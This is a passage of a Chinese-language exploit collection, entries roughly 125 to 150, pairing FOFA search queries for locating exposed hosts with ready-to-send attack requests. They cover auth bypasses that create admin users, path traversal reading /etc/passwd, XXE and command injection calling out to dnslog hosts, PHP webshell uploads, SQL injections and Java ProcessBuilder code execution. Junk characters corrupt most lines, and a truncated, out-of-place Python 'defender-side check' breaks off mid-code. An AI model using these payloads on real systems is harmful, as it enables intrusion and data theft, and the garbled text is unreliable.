' Y; k/ c8 u, K& C  ]8 {3 c' qCVE-2024-1709
5 w5 W2 C0 A: jFOFA:icon_hash="-82958153"
8 k: g- T* u/ d7 J2 Fhttps://github.com/watchtowrlabs ... bypass-add-user-poc
' F; Z" @9 l+ r9 K7 c( H" b: {2 ~$ b# k7 m9 \6 n8 m- b" f

7 n, d* R7 C7 b2 P6 Y4 {使用方法. ?' ~% z/ P! S8 I- `( e1 a
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
# ?+ S" Y( s2 H+ U" T% E  r6 Y8 a/ k2 A# y- u
0 Z5 N3 L; ?, b( B0 l  t$ P# y
创建好用户后直接登录后台,可以执行系统命令。" i5 v* j! J3 X5 y; E5 z  a
- l4 J6 M% W, \' Q4 N
126. Aiohttp 路径遍历  ]1 ^3 f9 E- [/ h( v2 }1 h
FOFA:title=="ComfyUI"4 g# Q  w3 r$ k; D
GET /static/../../../../../etc/passwd HTTP/1.1- X% V( Y0 _5 M2 W# {4 n- w
Host: x.x.x.x
( A. N4 D0 o% l  q; d% }" dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" u* M, P8 W/ d, F; V& q4 [1 [
Connection: close
8 {/ I2 C3 b& A0 oAccept: */*
/ t: n: _# f% L: A1 J. d2 NAccept-Language: en
, S; H$ v: a9 ^Accept-Encoding: gzip
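A defender-side check for the two request shapes that entries 122 and 126 above rely on: a base64-encoded SQL statement carried in a query parameter, and ".." segments climbing out of a static-file prefix. This is an added example written for this compilation, not code from the original post or from any of the listed products. The access-log lines are constructed, the /static/ prefix list is an assumption to adjust per deployment, and the check generalizes a little beyond the two entries: every base64-looking parameter value is decoded and inspected, not only one named sql.

```python
import base64
import binascii
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Common Log Format). They are not taken
# from any real host; the request lines reuse the two request shapes described
# in entries 122 and 126 so the detector has something to match.
SAM
PLE_LOG = None  # placeholder removed below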
8 e$ S$ d# p( }% I! x6 i1 V( @9 f0 u' _7 t. K( l. J
' d$ z4 J9 Z7 r  l9 A
127. 广联达Linkworks DataExchange.ashx XXE
. v8 a" c0 j# |1 l! B% BFOFA:body="Services/Identification/login.ashx" 0 n7 A" n4 Q( n- f; |
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
4 ]: M6 Q& l# iHost: 192.168.40.130:8888
, q3 |8 b0 p3 L5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.365 U. w9 Y/ z- x1 W/ P& S: ^/ B
Content-Length: 415
9 o; X' Q" P0 L" rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# M$ O, b0 w3 A7 s* T
Accept-Encoding: gzip, deflate  [  Y+ m* O& Y$ H9 a
Accept-Language: zh-CN,zh;q=0.9
3 k$ @/ I. e3 e# s" sConnection: close
8 [# V, b1 p' r% \9 W3 }Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
% l2 L% o9 K/ L7 NPurpose: prefetch) }- m* T0 e$ M7 `/ }. b. `
Sec-Purpose: prefetch;prerender! L1 W1 V- h  K
( }3 m. U7 t$ o9 l/ O
------WebKitFormBoundaryJGgV5l5ta05yAIe08 K  S  e3 U6 [: S
Content-Disposition: form-data;name="SystemName", a6 ]& @  U( z0 P
, @7 b% `0 T9 o1 e
BIM
- W& B( k5 V4 n6 q1 b------WebKitFormBoundaryJGgV5l5ta05yAIe0
- f- w1 E/ O% H$ ^% U3 x! d/ sContent-Disposition: form-data;name="Params"% j- \* B& @# n2 W1 v: V
Content-Type: text/plain
- k; h$ @7 E: c  ?% L: J% z8 Q( z! _
<?xml version="1.0" encoding="UTF-8"?>- s$ f( {" \9 A, s" D5 X0 P( K$ s
<!DOCTYPE test [
: N* h) ?* @6 \- N3 G7 G# ?<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 f3 B9 p4 L' I3 B: }9 H( d]' M! l+ _3 k+ Y7 w4 O4 u
>
0 @. p, s2 N1 X9 e6 d3 m4 y, }<test>&t;</test>
) U0 C$ z$ ]! y$ o+ W------WebKitFormBoundaryJGgV5l5ta05yAIe0--& I; h% R( A2 {# [
3 w  u& i6 V% p9 S& _) B
' b7 J6 L7 y6 r- Q
1 i/ Q9 z6 H8 k  w
128. Adobe ColdFusion 反序列化
' @" l4 C" n3 z+ e1 Y& QCVE-2023-382035 ?2 s5 _) D  y8 T
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)( _1 a2 {5 ~5 |  ~' s
FOFA:app="Adobe-ColdFusion"& u; C# {- E1 X& b& P' G
PAYLOAD
" P& }: r8 d/ \* @8 [7 _# ~0 B1 ~  n' X1 a+ k) j. |
129. Adobe ColdFusion 任意文件读取/ n: \5 B) a/ u  W
CVE-2024-20767
2 _8 k) b) F# `: a. ?FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
# T9 T7 O5 |: @2 y2 P第一步,获取uuid
5 ?+ {& x9 Q% Y: W4 C& s. ]GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
  S! ^& t4 V, q0 S8 R$ EHost: x.x.x.x
- f) Z7 {% b- g8 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- U+ W7 v7 c, V" ?- {+ R7 PAccept: */*
4 r$ }: Z: p) y' i9 R+ p' AAccept-Encoding: gzip, deflate) T( U+ v$ ]' Y$ j( ~
Connection: close
4 L& l* f: e2 j( F/ g0 V- R+ e: b9 n
0 U; q8 I4 s9 l- k" ~3 [+ K1 L
$ Q: `$ q! J" b0 \+ w  G5 m第二步,读取/etc/passwd文件. l. |) d3 u( T% X
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.14 w4 E& X& a# @% x- }
Host: x.x.x.x5 t, W; E" k& b1 R3 ~8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( C6 c" T) ~0 M& r: K7 U
Accept: */*4 X7 ]+ \1 L- \9 D
Accept-Encoding: gzip, deflate
& S: J: W) j( WConnection: close5 y1 D: e4 B+ N
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
. @3 ~. A3 v, t4 ^$ s6 ?
; \& [& Z! z+ s% ^) h  j3 R& [" L
( b' F' s/ [; E130. Laykefu客服系统任意文件上传
" R3 D& F5 i( X/ tFOFA:icon_hash="-334624619"
- H/ Q  C) J- f. bPOST /admin/users/upavatar.html HTTP/1.1
7 [5 S: x1 _- |6 e1 V. p9 tHost: 127.0.0.1$ F8 Y' @0 w, Z- Q( A5 L
Accept: application/json, text/javascript, */*; q=0.01
  _( A% i: R$ J2 Z" X2 bX-Requested-With: XMLHttpRequest( z5 a; I3 w+ @7 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
1 l, x( U1 [6 Z! v" {Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
! K; `  X% L5 r& @Accept-Encoding: gzip, deflate0 W6 t! Y- h4 L# W8 F
Accept-Language: zh-CN,zh;q=0.9# h- u7 }5 f/ n. x1 I! q
Cookie: user_name=1; user_id=36 h  [* y  ~  B0 n
Connection: close
- b  E- j0 Z1 G  Y  T8 Z: g' y0 t( b/ B# c1 s
------WebKitFormBoundary3OCVBiwBVsNuB2kR
' M+ h9 q# s, ]1 u* F& `  rContent-Disposition: form-data; name="file"; filename="1.php"3 x1 X( B/ Z+ e: Q9 \
Content-Type: image/png& X" b( S! v$ L

# u( T( c$ }/ L) d, q7 c<?php phpinfo();@eval($_POST['sec']);?>
! a/ }( V/ B/ a; y9 L6 o+ w" E------WebKitFormBoundary3OCVBiwBVsNuB2kR--) j/ ^9 C/ }9 ]$ Z5 T3 l

% {' [5 Z1 P  l0 X1 `$ q9 O' s% H5 i1 ]6 L6 [7 T
131. Mini-Tmall <=20231017 SQL注入: a$ _1 d/ S  S9 {
FOFA:icon_hash="-2087517259"
% Q& Y& c7 Q$ r# r7 S( o5 I后台地址:http://localhost:8080/tmall/admin
2 v, H% e4 q" Z4 g& Q5 ehttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)" v, y- G8 ~) r/ C) k2 r% L

) E6 o" z( l! \# x& A/ ~132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% P! p$ P" H6 U2 `CVE-2024-27198
2 t# f, y8 m1 g3 D" L8 }/ ]) T7 eFOFA:body="Log in to TeamCity"* b4 V/ J$ F! Q$ g/ I
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.11 C  O. x1 e$ f
Host: 192.168.40.130:8111
% U0 s- s$ d. g! l$ A& C) W% b+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 A( p: X0 D) A) r) n. s3 e* PAccept: */*
# P7 D4 n2 n! M8 o; YContent-Type: application/json
9 C, L4 U& x% H& U8 eAccept-Encoding: gzip, deflate/ M: E' D3 ?& E) j: u; i2 q/ D

! p9 c2 H# Q% m% ^$ ?" v{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# z5 w& O8 s1 ~% `$ z

+ e6 D1 |. l7 e; ~2 v/ y- U
* G0 t; F) j& Q0 \4 z# Z* r" `$ aCVE-2024-27199
# S2 ~# `/ G# l( p1 H/ F/res/../admin/diagnostic.jsp
5 g+ Q6 D4 f* W4 V6 o2 ~5 A/.well-known/acme-challenge/../../admin/diagnostic.jsp+ O; `% o; |, f- v2 O
/update/../admin/diagnostic.jsp* e& y; V0 @1 _* o
6 h+ d: P& g- W! M$ x7 Z/ ^: T
$ K8 c& U, ~% {" [
CVE-2024-27198-RCE.py
& ^. E) B2 _) S; f4 v7 ]6 ~0 `; ?! g& R& a# q
133. H5 云商城 file.php 文件上传- `0 p2 S9 x3 n: L" C
FOFA:body="/public/qbsp.php"
5 |% T$ W+ b  t/ `' n$ mPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1. P8 ^$ M* s. b- y* C8 T
Host: your-ip
! J* c+ s; p1 ]3 V! bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 g; d5 ^" n8 s; o  d. o) ?, e5 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx4 h: _4 j& c' p. e, G, d8 e

8 e4 ^( q9 U- K, v5 @------WebKitFormBoundaryFQqYtrIWb8iBxUCx3 w4 d+ o3 }" V) }4 }2 l
Content-Disposition: form-data; name="file"; filename="rce.php"$ P! O- z. j: Q% a4 I4 f
Content-Type: application/octet-stream: u6 f# d, B8 d% K! U1 G2 k

% x: [$ a5 ]7 x/ W9 D$ J<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 I, Q( x+ c2 h( v* |------WebKitFormBoundaryFQqYtrIWb8iBxUCx--# r! a, x# s0 I/ J9 }% i) G
. b1 n8 d  k/ N9 ]

3 F% o$ {2 a# q2 D4 _7 {2 u" M/ [( m5 G$ X) ~
134. 网康NS-ASG应用安全网关index.php sql注入
* D9 x( S8 w% S& u6 f; HCVE-2024-2330
1 D$ g$ X6 {# W; m+ I1 m/ f( z- K' RNetentsec NS-ASG Application Security Gateway 6.3版本$ m& m: F+ ^$ Q- }* [$ V
FOFA:app="网康科技-NS-ASG安全网关"
" v  h7 G; R+ u8 @. u5 b5 mPOST /protocol/index.php HTTP/1.1
2 @8 I; d% Y  a( F: MHost: x.x.x.x
' y4 z% @% C" O2 ?Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
" Q) B6 }2 h& u6 h2 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0- w9 ?6 \  |4 {* ^
Accept: */*
! f9 o% Y, j* ^# `. P8 w( VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ E% Y% _2 u7 h9 z" S7 v
Accept-Encoding: gzip, deflate& ?. @% M& c5 G5 n$ ]2 O
Sec-Fetch-Dest: empty4 U' r! ~! [) p3 R$ x8 X
Sec-Fetch-Mode: cors
0 w( u3 E5 ]0 K" \8 `7 |, xSec-Fetch-Site: same-origin" |8 z0 o) v) F
Te: trailers/ c9 V2 z6 f/ I! k3 l
Connection: close
( N) U, w/ k/ k* ]Content-Type: application/x-www-form-urlencoded
8 {7 ^, p. u' t7 g+ AContent-Length: 263. J8 U) w! |' i6 o& u
$ _( A' o  {2 e% Q
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, M' i, d* j9 f/ k8 \2 e  W

9 ^$ F7 o/ X( f5 p, N1 u
/ _7 j$ z% `# d( w3 W% J0 Q135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 ?* b0 E9 _. d* V& i4 g' M9 RCVE-2024-2022
  i: G& z4 A; c5 C: M% y" f' bNetentsec NS-ASG Application Security Gateway 6.3版本9 ?: d7 q; m2 b) v0 A  F& {8 w
FOFA:app="网康科技-NS-ASG安全网关"* D: p4 P! m; L+ l. j, q
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
& ]5 N3 K5 ]' N, @+ w9 {7 PHost: x.x.x.x) p; L0 Q4 n2 R% U+ Y+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' q. k2 C0 ^. u' M$ {. NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% D. N" n2 |' x3 Z' q
Accept-Encoding: gzip, deflate
' {0 T5 {0 g% s; y- f: @1 k2 }0 UAccept-Language: zh-CN,zh;q=0.9
/ P& B# V$ W6 gConnection: close( _7 N0 `! _0 F2 H$ z
8 ~/ ~5 b$ x2 |' _! B

* j4 }' p; N% ~- D$ y0 v7 z136. NextChat cors SSRF
0 r; h7 G& O5 L( H4 a6 |" QCVE-2023-49785! x7 J  H6 m/ M: ?# @* d2 @
FOFA:title="NextChat"
: c/ Q. d% ]6 _# O2 F3 l* lGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
0 C  \3 L* s; lHost: x.x.x.x:100006 \) X% s, {. i& a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. F0 H( l( R) n4 x9 ^, g
Connection: close
7 k. y* `7 }6 WAccept: */*
7 ~3 S( l) g" P0 OAccept-Language: en
. X5 k8 d4 f& G% e3 @* JAccept-Encoding: gzip
0 _, j& s: A8 n# G: r# e  ~& F) w6 Y

$ c1 s4 Y* X# P4 f* ^- K137. 福建科立迅通信指挥调度平台down_file.php sql注入! s- b2 v7 E" N" v
CVE-2024-2620
; S. n9 ?% b- |6 M& xFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ v1 d& F6 v8 l5 B
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1% n$ L4 a9 I' y' S; Q/ K3 c1 E
Host: x.x.x.x, g" Z2 `; W3 t  R* y5 c- z/ D4 D% B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) O0 _1 ~# l. }9 c* Z: j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* Q1 ]- T6 y% R3 H* m# VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) s5 {, H; E  v# e" S6 n9 i" U5 `Accept-Encoding: gzip, deflate, br  }+ k* ^" }3 ^, y1 D* B* }7 y
Connection: close
+ G- @% c) X9 M$ ~, ~! xCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj+ N  }& Z& S/ E' O2 R
Upgrade-Insecure-Requests: 1
' j7 F: Q& t  @1 `0 [4 d5 y
9 J$ l5 x( w0 }" D+ @3 x4 R) w4 W" [0 w2 I' B
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 p; l3 Z1 c3 m. l; s1 N
CVE-2024-2621& f  R/ |4 b, G% o% F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% ]& l# f  G8 c- I  g1 ], ~GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1! Q! K4 g1 M6 v2 h
Host: x.x.x.x
4 k2 a! B0 E* Z8 {: k6 _  aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! u3 u2 h2 Z. \+ `0 N: z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, _1 C& |6 F, M3 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ I$ d# F) Y7 E. d& p7 g
Accept-Encoding: gzip, deflate, br
% Y2 a! y2 m* {& C0 Y( x: f" tConnection: close
6 m2 E$ V# E: cUpgrade-Insecure-Requests: 1+ l1 A* `% v. h' g- V  Y' a

( n; `% p/ A2 Q  {+ P6 K8 G7 ~: _! R6 _  J% n( f0 }2 T6 Z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入3 [. a3 l& `  N7 y/ {
CVE-2024-2622
( a- n( `+ h. GFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 B$ X2 c/ Q0 J. P1 S- I1 y
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.10 O0 C/ Y! q& J. G2 Z
Host: x.x.x.x$ {: I/ G# u; D9 @- `& t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& c7 `/ a% E# t' c$ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, q& Y8 |* L* c" ]4 q3 U2 P6 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' `: A$ Q8 }$ i9 L
Accept-Encoding: gzip, deflate, br
& H# C1 X$ j# z% }1 j& fConnection: close+ l2 P/ x: U! _+ o1 @, y% {
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk4 _! o2 e* I& J% f$ d) h( Z
Upgrade-Insecure-Requests: 18 C# G- H8 E. T$ g, ^
( }6 Q$ m7 ~" S2 z& S
1 `( G9 T6 ?/ n) I  T
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& p8 L  m+ o% z+ f0 e- pCVE-2024-2566, t) i) i; F# P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"  z! z$ Z# `* x3 U
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
) x- d# M3 T) ?1 ^  U) L, bHost: x.x.x.x
# c0 f3 N. D4 D1 a; e+ ~" ~- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# T, {6 u" |9 A" \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- [6 h& B0 p2 S( Q( |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  |& W7 C4 ^3 _. p: |
Accept-Encoding: gzip, deflate, br
& ], a% [: Y3 r" s* I; I+ nConnection: close
. H0 \. W: _$ Y% K: V* vCookie: authcode=h8g9
7 ?% D- z$ t& KUpgrade-Insecure-Requests: 1
5 g7 ^7 z& D( r& v
( u) T* x: j7 R9 Y, X1 q( x; k' I4 s3 o3 d
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" ?# G- @) z/ b2 U  ~
FOFA:body="指挥调度管理平台"
$ u( O% h$ @% K9 m+ @8 G- LPOST /app/ext/ajax_users.php HTTP/1.1
2 z; q- D& _0 i% E3 H& o* HHost: your-ip
, f$ M' g# v- C! X. p5 e5 EUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( I" J% e: G3 \$ Z! U
Content-Type: application/x-www-form-urlencoded: D4 t3 k8 u) [6 L

% ~2 S+ ]: o1 T  n8 \% L# W* r# m" N4 r( d5 }; d3 F- O7 {  c0 k
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -/ I- J2 I7 m0 H7 A  y& g2 ]

( g% B) B) h8 i7 P+ j( Y( d3 B  `2 Z+ E; o  t- |
142. CMSV6车辆监控平台系统中存在弱密码
3 Q' v4 d9 v% p) R$ R8 |$ cCVE-2024-29666
1 t0 o' O5 B# `, E) \% I+ RFOFA:body="/808gps/"" X4 ~  F' ~4 B
admin/admin
' X+ Q$ |7 x0 [2 L143. Netis WF2780 v2.1.40144 远程命令执行
) {( a0 Q' i- X5 K6 D3 FCVE-2024-25850$ @; s2 m: D* n  T7 q
FOFA:title='AP setup' && header='netis'
% ]) _3 ^  ~- z" g1 |PAYLOAD
- K* a& u* O. T" ~) b
5 E; f2 _" b7 z. R) U9 n144. D-Link nas_sharing.cgi 命令注入' `2 K- V3 v8 ~0 Q5 l% j8 C
FOFA:app="D_Link-DNS-ShareCenter"1 F) {2 M( L3 \* Q0 q
system参数用于传要执行的命令' g7 `5 T% H3 J! I4 k/ D
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.10 ~! r  ~; [& b# `
Host: x.x.x.x# J3 ~7 H$ ]# f. k8 u  R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.02 M/ }- J1 N7 E. x# g: R% a
Connection: close) J" f. b: z& m+ L  Y+ T; z$ c& w
Accept: */*
& M4 k; w9 V/ kAccept-Language: en
, x* r# M8 T7 C# Y! V/ T9 J. vAccept-Encoding: gzip
* y7 ]; g. S4 r
$ \2 F* m! l( R1 E
. E9 K8 ^' s  a! Y9 B  u. z0 ]145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" f6 [( n3 d# h% bCVE-2024-34005 ?3 C5 N0 E2 |; d7 a! E
FOFA:icon_hash="-631559155"
  j$ \$ f( g/ ?& f; RGET /global-protect/login.esp HTTP/1.1
" A- [! t- C7 @7 t# D; V( K5 b" fHost: 192.168.30.112:10050 J8 Y, F: Q9 g! [7 s, c  s$ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 [6 _; q, w( R
Connection: close
4 n- F( s# K  YCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;0 |5 B) _3 B( I9 }
Accept-Encoding: gzip
- u: i- F4 V. [6 w: {) [- Z6 b' I6 i; |/ m  A( f# s
) a8 m, s. H  T* {1 w& P# J
146. MajorDoMo thumb.php 未授权远程代码执行: a! p) V4 ^6 \  v, S
CNVD-2024-02175
' S7 c0 o" z+ _; j! eFOFA:app="MajordomoSL"2 o: k: s6 f# B$ A0 {
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1% Q" T- f+ Z1 N% |$ g
Host: x.x.x.x
3 i( W! L# w( g7 _* ]. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
7 W2 Q6 n) g1 k: j- VAccept-Charset: utf-8
7 X7 x9 G- m) u9 Z1 TAccept-Encoding: gzip, deflate3 _1 G  [9 r& q: h0 R
Connection: close- K1 S/ L5 W) r: E
6 V( l$ l6 w! m- l2 l, T( z

: w, b; S$ U+ k8 V6 l. |147. RaidenMAILD邮件服务器v.4.9.4-路径遍历  _: q4 i' y( G
CVE-2024-32399" W& t. K( g5 M0 B
FOFA:body="RaidenMAILD"+ q5 X2 T+ }- ~9 f
GET /webeditor/../../../windows/win.ini HTTP/1.1% ~9 L2 H% {: x( }
Host: 127.0.0.1:81  o6 r, g$ F8 Z$ Z0 k+ `9 |
Cache-Control: max-age=0
! d# b1 ?( H7 z( NConnection: close
  V/ x) \1 Y' x( A
; N+ \  b) ?; g* n) u- `! H# B( b( N) E* z
148. CrushFTP 认证绕过模板注入+ Z6 d: F' J5 B! b
CVE-2024-4040- i* ~; x, q( v
FOFA:body="CrushFTP"
$ {: O& I( L6 Y- D, S& O, s6 `3 E" |PAYLOAD. ]3 @7 B7 R; F3 s$ W' @+ q) w# z

* Z7 M& o! C2 J149. AJ-Report开源数据大屏存在远程命令执行
) W4 t( C; r% m2 u; m7 n5 NFOFA:title="AJ-Report"
7 k* Y9 c& J* j5 ?9 k7 U# d" ^3 P3 R% s9 z7 C% c  K, ^, ?7 [
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1. b- g  F+ c! e5 x3 p5 H& X- H2 J
Host: x.x.x.x
5 D! I/ `, O3 ~( Z# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ S- g/ @2 D  B9 S5 S& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 C' j8 [& h6 \2 G! R
Accept-Encoding: gzip, deflate, br  A! G. v2 y- z8 f* J7 g
Accept-Language: zh-CN,zh;q=0.9! ~! R) W7 M8 b1 d* d  I& F" `( X
Content-Type: application/json;charset=UTF-83 F; z4 i/ h, K" S
Connection: close
) e. i: I- ?0 T+ Q- }8 N; ~3 c- q9 r
0 L1 G4 a$ b9 R{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
; F7 ~7 D- }! z7 l9 `" U+ i; Y( E% r' g* q* K
150. AJ-Report 1.4.0 认证绕过与远程代码执行/ \! |/ Q# w; R+ z' s+ ?8 A, D
FOFA:title="AJ-Report"
8 i5 r$ b0 Y/ b) r" rPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
4 O  H3 x6 U: X- [- IHost: x.x.x.x
* v) [5 f$ j! l& N/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# h# L$ f' i  y( w7 m. ~0 L) i* E: \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 q! a7 ~4 J1 i* u6 }8 I1 JAccept-Encoding: gzip, deflate, br8 v5 e- b8 t3 ^! l' @
Accept-Language: zh-CN,zh;q=0.9
  A6 a/ ?5 X+ t* DContent-Type: application/json;charset=UTF-8
  X: b% c' D8 }Connection: close. P' ^. u  R! W) B, D. i
Content-Length: 339- [4 v* E7 K! A! C/ `
7 O4 L  s; @; I# F* D, t  w6 _3 o, [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 N4 K# g8 K0 q% g0 l- @! x9 r! `1 A- L  t' k. V% z- a. q" E) q
